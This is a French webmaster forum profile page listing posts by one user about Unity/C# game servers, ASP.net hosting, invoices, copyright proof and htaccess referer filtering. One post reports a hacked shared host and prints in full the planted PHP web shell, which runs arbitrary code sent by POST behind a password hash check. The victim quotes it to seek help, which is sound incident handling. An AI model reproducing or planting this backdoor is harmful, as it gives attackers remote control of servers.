Aller au contenu

Pat AfterMoon

Hubmaster
  • Compteur de contenus

    110
  • Inscrit(e) le

  • Dernière visite

Tout ce qui a été posté par Pat AfterMoon

  1. Bonjour LiliToxic et bienvenue sur le HUB ! Un petit lien vers le genre de chose que tu fais avec Unity 3D ?
  2. Il existe pas mal de scripts de chat en AJAX, il me semble que les meilleurs donnent l'impression d'être aussi réactif qu'un traditionnel IRC. Je crois que le chat suivant (http://chat.developpez.com/) est basé sur le projet open-source AnoChat (php/javascript) et le résultat est excellent.
  3. Merci pour tes réponses SStephane, je suis en train de découvrir l'écosystème Microsoft/IIs et en temps que vieu développeur C++ nouvellement C# cela me plait de plus en plus. J'ai jeté un coup d’œil à DotNetNuke et cela m'a emballé. En plus pour ce genre de composant je ne me vois pas utiliser autre chose que de l'open-source. Cela fait plaisir de voir que même ce qui tourne autour de Microsoft à finis par prendre le virage. Oui, c'est ça. Pour l'instant je n'ai fait que des tests basiques d'appel depuis Unity vers un site web ASP.net. J'ai testé en SOAP et en JSON. Du coté du serveur c'est quasi transparent, le Framework DotNet prend tout en charge. Du coté de Unity ce n'est pas pareil. Si tu veux faire un jeu dans le navigateur il y a des restrictions de sécurité qui empêchent d'utiliser des librairies pré-compilées, du coup on a pas accès à toute la couche communication du Framework DotNet. Pour un projet Unity Standalone, il n'y a pas de problème, on inclut l'assembly qui va bien et cela devient aussi simple du coté client que serveur. Je n'en suis pas encore au stade de faire des vrais tests de charge, mais ce qui est sûr c'est qu'au niveau d'un jeu vidéo on ne gère pas une liaison de type "webservice" comme une liaison UDP entre un client et un serveur qui interagissent avec un ping de moins de 100 ms. Mes webservices vont gérer l'authentification (login/pass) et la persistance (inventaire, score, ...etc.). Par exemple, sur mon projet précédent il n'est pas rare que des joueurs aux 4 coins du monde prennent plus de 5 secondes pour un faire un appel RPC, mais le jeu le gère parfaitement. Les seuls appels bloquant ont lieu lorsqu'on change de niveau ou lorsque le joueur "meurt", dans les 2 cas ce n'est pas trop gênant.
  4. Et bien voila encore un exemple de réponse trouvée surtout par le fait de formaliser la question (et après une nuit de sommeil ) En fait cela fait des lustre que j'ai ce schéma en tête mais en relisant la question ce matin, je me suis dit : mais c'est beaucoup trop compliqué pour un projet que je veux mener à moi tout seul. Dans mon projet précédent c'était la même base de données "user account" qui servait pour le jeu, le forum, le chat, le profil ...etc. En loccurrence j'avais tout greffé sur la base de donnée de phpBB. Mais cela crée une dépendance qui est lourde à gérer et cela fait de multiple source dinteraction avec les données du joueur. Finalement aujourd'hui, avec les idées plus claires, je m'oriente plutôt vers ça : Merci au Hub pour m'avoir permis d'éclaircir mes idées EDIT pour SStephane (on a posté en même temps) : merci de ta réponse qui confirme un peut plus ce dont je me doutais.
  5. Bonjour, Je suis en train de développer un projet dont voici à peut près la structure : Il s'agit d'un jeu vidéo dans le navigateur qui interagit avec un site web. J'ai déjà développé un projet similaire mais avec des technologies différentes (client Windows en C, web-service REST en PHP, forum phpBB, web-chat et player-profile en PHP). Cette fois-ci je voudrais vraiment simplifier les choses et harmoniser au maximum les outils et les langages utilisés. Le client est fait avec Unity et le jeu est codé en C#. Je souhaiterais utiliser le même langage coté serveur. Jusqu'à maintenant je n'avais que des sites web sur des serveurs Apache/MySQL/Php. Je viens de prendre un hébergement IIs/ASP.net/SQL-server et j'ai fait quelques tests avec des web-services ASP.net en C#. Tout fonctionne comme je le souhaitais, et le fait d'utiliser la même technologie coté client et serveur simplifie vraiment les choses. Maintenant je me demande ce que ça peut donner pour le forum, le webchat et les pages web spécifiques. Le serveur IIs de Microsoft propose aussi le Php. Au début je pensais mettre à nouveau un forum phpBB et faire les autres développements web en PHP. Maintenant je me demande si je ne vais pas tout faire avec de la techno Microsoft. A priori il existe des forums, des webchats et des CMS open-source en ASP.net et C#. Est ce que des webmasters de ce forum savent ce que ça vaut ? des conseils à me donner ?
  6. Mince, je suis super vexé, pour mes 2 sites web il indique "Désolé, nous n'avons pas de données sur ce site" Bon d'un autre coté, des sites à 50 visites par jour...
  7. Donc si j'ai bien compris Nullette, tu as opté pour un huissier prés de chez toi. Est ce qu'il est possible de savoir combien un tel constat t'a couté ? éventuellement par mp si tu préfères. Merci d'avance.
  8. Merci pour la réponse Kriss. En tout cas s'il y a d'autre exemples aussi détaillés que le lien d'Arlette sur des affaires similaires, je suis preneur
  9. Merci Arlette et Kriss pour vos messages, voila qui confirme comme souvent l'incroyable qualité de ce forum. Ce sujet m'intéresse vraiment et sans la réponse de kriss j'envisageais de contacter CopyrightFrance pour connaitre leur avis sur l'affaire citée. D'ailleurs, existe t-il un message officiel de CopyrightFrance à propos de cette affaire et de ce qui semble être une erreur de procédure ? Ou alors existe t-il des liens vers des affaires semblables ayant mis en uvre des services comme CopyrightFrance ?
  10. Pour les constats, peut être que quelqu'un de ce forum a déjà testé www.constatonline.com Ce service semble être lié à www.copyrightfrance.com que j'utilise et qui est très sérieux sur le plan technique. Par contre je n'ai encore jamais testé en justice.
  11. Merci pour vos réponses, mais vous m'avez rendu complètement parano Ce qui m'embête c'est que je ne saurai jamais quelle est vraiment la faille sur ce coup. Ce qui m'inquiète le plus c'est mes scripts maison, car je ne maintiens plus trop ce site et que les risques de failles sont nombreux. En tout cas à l'avenir si j'ai un nouveau site à faire je vais peux être revoir ma stratégie vis à vis de la formule Pro multi-domaine d'OVH. Parce sur ce coup la, avec un site hacké, c'est tous mes site qui sont exposés. Par contre j'ai remplacé le script du hackeur par un script à moi qui stocke des infos en cas d'accès, et pour l'instant je n'ai eu aucun hit. Peut être que le script n'est utilisé qu'une seule fois juste après avoir été introduit. C'est dommage, j'aurais bien aimé voir l'adresse IP et le mot de passe Mais s'ils avaient poussé le vice jusqu'à effacer le script, je ne me serais même pas rendu compte de quoi que ce soit.
  12. J'utilise Filezilla comme client FTP, mais quel est le rapport ? Quelle est cette histoire de "compte Filezilla piratés" ? Je n'ai pas de "compte" FileZilla, par contre j'ai un compte FTP pour accéder à mon site web, et jusqu'à maintenant j'avais gardé le mot de passe attribué par défaut par OVH.
  13. Bonjour, Ce soir me connectant à mon site web par FTP j'ai découvert un truc que je n'avais jamais vu. Un répertoire a été créé avec un fichier PHP dedans, cela ressemble a un hack capable d'exécuter un code PHP transmis à distance. Le répertoire s'appelait "hammerda" et le fichier 5bfa44.php. Le contenu du fichier était le suivant : <? if ( md5($_POST["PARAM_HASH"]) == "d673f1f28d9cddf84ad8aeb58d430b8e" ){ ?> <? if(get_magic_quotes_gpc() == 1){ ?> <? $post = stripslashes($_POST["f"]) ?> <? }else{ ?><? $post = $_POST["f"] ?> <? } ?> <? $test_func = create_function("", $post) ?> <? $test_func() ?> <? } ?> <? die ?> D'après ce que j'en comprends cela permet d'envoyer du code source PHP à distance et de l'exécuter directement. Il y a même un système de protection pour éviter que n'importe qui utilise le script (en tout cas c'est comme ça que je comprends le PARAM_HASH). J'imagine que cela permet d'envoyer du spam depuis mon serveur ou d'attaquer mon site depuis l'intérieur. Bien sur j'ai effacé tout ça, mais je me demande comment le hackeur a réussi a le mettre chez moi. Pour info, j'ai un hébergement mutualisé, PHP, MySQL, plusieurs scripts maison et un forum phpBB.
  14. Bonjour, Pour un site vitrine de PME française je voudrais savoir quel est l'outil de statistique globalement bon, mais qui propose la meilleur géolocalisation des visiteurs français. Si l'outil a une interface en français, c'est un plus. PS: Sur mes sites persos j'utilise Google Ana en anglais, et je ne vois pas s'il est possible de le mettre en français. merci d'avance.
  15. Bonjour, Je viens de recevoir cette sorte de spam qui semble basé sur les informations du whois, malgré plus de 2 ans que mes données personnelles sont masquées (OwO chez OVH). (en vert mon email, en rouge mon domaine) Je n'envisage pas de perdre du temps la dessus, mais entre ce genre d'email et les courriers postaux qui me proposent de renouveler mes domaines pour plus de 50 USD par an, cela va être dur de faire le tri le jour ou il y aura vraiment un problème de marque déposée
  16. Je viens de découvrir ce qu'est .NET remoting et j'ai l'impression que ça pourrait bien coller à mon projet. Est ce que certains connaissent cette techno par ici ?
  17. Bonjour, Depuis pas mal d'années un de mes hobbys consiste à modifier le jeu vidéo Quake2 pour l'interconnecter avec un site web. Chacun peut démarrer une partie et être rejoint par des équipiers, et tout ce petit monde est relié à un serveur centralisé qui ajoute quelques joyeusetés. Voila à peut près la topologie du système : Pour voir ça en live : www.coopordie.com/quake2 Depuis l'an dernier j'ai démarré un nouveau projet qui partage quelques concepts communs. Pour la partie client et serveur de jeu, j'ai déjà fait mon choix de techno avec Unity et C#. Par contre je me pose beaucoup de questions concernant la partie "WorldServer". Contrairement au projet précédent je ne voudrais pas juste une sorte de webservice qui réponde aux requêtes du "game server". Je pensais plutôt a un process par partie en cours qui puisse réagir aux requêtes du "game server" mais aussi faire sa vie, en gros un programme qui tourne en tache de fond, pas juste une série de scripts qui réagissent à des requêtes. Comme je ne voudrais pas trop me disperser dans de multiples technos, je me demandais si je ne pourrais pas utiliser C# aussi pour cette partie. Du coup, serveur IIS plutôt que LAMP ? et quelle techno pour le reste du site web ? Petit aperçu de la topologie du système : Quelques liens vers le 1er proto de la partie jeu : 2009 prototype (video inside) Doc utilisateur (un peut outdated) Donc les questions que je me pose vraiment : - Quelle techno pour maintenir un process vivant par instance ? - Quel protocole pour causer avec le "game server" (anciennement une sorte de RPC à la sauce REST) - Quelle plateforme pour le world serveur central ?
  18. Cette histoire de largeur sur le web est un sacré marronnier Par contre je viens encore de vérifié mon Google Analytics, et bien qu'il y ai une rubrique "Visiteur/Résolutions d'écran", je n'ai encore jamais vu de statistique "Visiteur/largeur d'affichage" ni de "Visiteur/Résolutions d'écran/largeur d'affichage". Pourtant il doit y avoir plein d'internautes qui ont de fortes résolutions et qui n'affichent pas leur navigateurs en plein écran. Je suis en 1920 x 1200 et j'affiche rarement du texte sur plus de 50-60% de la largeur (que ce soit FireFox ou Word d'ailleurs). Donc au final les résolutions entre 800 et 980 sont souvent les plus confortables. Avec un marqueur en javascript cela doit bien être possible d'avoir cette info...
  19. Merci brocexco, à priori ce n'est pas si compliqué. J'avais peur que pour les étrangers il y ai une obligation d'un identifiant officiel, un peut comme notre code siret.
  20. Bonjour, Je suis travailleur indépendant et depuis de nombreuses années j'achète à titre professionnel sur internet. Pour ce qui est des revendeurs français, aucun soucis, j'ai une facture classique et je rentre ça dans ma compta comme d'habitude. Par contre lorsque j'achète à des revendeurs hors France, j'ai des factures sous des formes diverses et variées, je me demande si en cas de contrôle fiscal je ne risque pas d'avoir des problèmes avec certaines d'entre elles. - Certaines factures intègrent un "Tax ID" et un "Vat ID" du revendeur, est ce que ça remplace le numéro de siret d'un revendeur français ? - Y a t-il une différence à faire entre revendeur CE et hors CE, hormis le fait que les CE me demandent généralement mon numéro de TVA intracommunautaire (Vat ID) pour me facturer hors taxe. - Certaines de mes factures sont faites par des intermédiaires comme Plimus lorsque j'achète du graphisme fait par un artiste freelance, ou alors une licence pour un shareware. Est ce que c'est gênant ? Jusqu'à maintenant c'était des sommes dérisoires, toujours inférieures à 100 euros, mais à l'avenir je pense dépenser plus d'argent de cette façon. Je ne souhaiterais pas qu'a l'occasion d'un contrôle fiscal on me dise que mes factures ne sont pas valable et qu'il faut sortir tous les montants de ma compta
  21. Es tu familier des fonctions "remplacer dans des fichiers" qui existent avec les éditeurs de texte comme UltraEdit ou PsPad. Dans un cas similaire il y a quelques années c'est ce que j'avais utilisé. Si le fait de lancer un rechercher/remplacer dans plusieurs centaines de fichiers à la fois peut faire peur, je te conseille de faire plusieurs essais sur quelques fichiers avant de trouver la bonne "formule". Ensuite, après avoir fait des copies de sauvegarde, tu lances l'opération sur la masse de fichiers. Même s'il y a du travail de vérification, ou s'il faut le faire en plusieurs fois à cause des différences entre certains fichiers, ce genre de manip peut faire gagner des heures, ou rendre possible un truc qu'on croyait impossible
  22. En fin de compte mon problème est plus une histoire de référencement. Je vais commencer à travailler sur un nouveau projet, dont je veux partager l'avancement avec quelques forums techniques (du style du HUB). Je ne veux pas que ça parasite mon projet actuel (en signature). En fait ce que je vais partager n'est pas confidentiel, puisque de toute façon je vais poster dans des forums publics. Mais comme la thématique est commune, cela m'embêterai que mon projet en cours de développement passe devant celui qui tourne déjà (au niveau referencement). De toute façon l'histoire du REFERER est réglée, je vais discuter du projet dans un google.groups, et comme pas mal d'utilisateurs utilisent le mail plutôt que le web... Je vais me contenter d'utiliser un disallow dans le robot.txt, tinyurl pour éviter les liens trop voyants, et un nom du style MyProject2009 plutôt que TrucMuche2.
  23. Mon but : créer un répertoire dans lequel je puisse mettre toutes sortes de choses (page html, images, pdf ...etc). Mais je veux que ce répertoire ne soit accessible que depuis un lien posté sur un site, ou alors en navigation interne entre les pages qui sont dans le répertoire. Pour tester, j'ai fais un .htaccess qui filtre par REFERER (je fait un test en live avec le site du HUB) : # Referers Filter (Allowed Sites) SetEnvIfNoCase Referer "^http://.*/tmp/test/.*$" allowed SetEnvIfNoCase Referer "^http://.*webmaster-hub.*$" allowed Order Allow,Deny Allow from env=allowed Lien vers l'index : http://www.aftermoon.net/tmp/test/index.html Et à priori ça marche aussi avec tinyurl, qui a l'air de préserver le referer : http://tinyurl.com/ko3vkw J'ai aussi ajouté ça dans mon robot.txt pour éviter le référencement de mon contenu inaccessible : Disallow: /tmp/ Bien sur, vous ne pourrez accéder à la page depuis vos favoris, il faudra repasser par la page ou je donne le lien, c'est voulu. A priori ça à l'air de marcher, mais est ce qu'il y en a qui ont des remarques ou des idées de cas dans lesquels cela risquerait de déconner (accessible à ceux qui ne devraient pas, ou inaccessible à ceux qui devraient.
  24. Peut être, mais c'était probablement pas du Z80 Bienvenue jeunot !
×
×
  • Créer...